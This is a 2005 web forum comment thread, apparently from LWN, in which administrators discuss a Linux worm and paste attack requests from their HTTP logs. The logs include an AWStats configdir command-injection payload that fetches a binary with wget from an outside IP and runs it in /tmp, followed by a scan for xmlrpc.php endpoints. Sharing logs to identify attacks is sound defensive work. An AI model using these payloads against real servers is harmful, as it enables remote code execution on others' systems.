A Linux worm on the loose?
A Linux worm on the loose?
Posted Nov 8, 2005 15:20 UTC (Tue) by xach (guest, #2349)Parent article: A Linux worm on the loose?
I've seen the request pattern in my HTTP logs in the past few days.
Posted Nov 8, 2005 15:48 UTC (Tue)
by mrshiny (guest, #4266)
[Link]
Posted Nov 9, 2005 13:51 UTC (Wed)
by sgreppucci (guest, #14800)
[Link] (1 responses)
Posted Nov 9, 2005 21:55 UTC (Wed)
by diegoliz (guest, #29285)
[Link]
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1"
I second that; my web server has been targetted as well, but I'm not running php-xmlrpc and I'm up to date anyway. But yet another thing filling my logs...A Linux worm on the loose?
What do the requests look like?A Linux worm on the loose?
I don't know if it's this worm but today I got the following sequence on the logs:A Linux worm on the loose?
"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1"
"POST /xmlrpc.php HTTP/1.1"
"POST /blog/xmlrpc.php HTTP/1.1"
"POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1"
"POST /phpgroupware/xmlrpc.php HTTP/1.1"
"POST /wordpress/xmlrpc.php HTTP/1.1"
"POST /blog/xmlsrv/xmlrpc.php HTTP/1.1"
"POST /drupal/xmlrpc.php HTTP/1.1"
"POST /xmlrpc.php HTTP/1.1"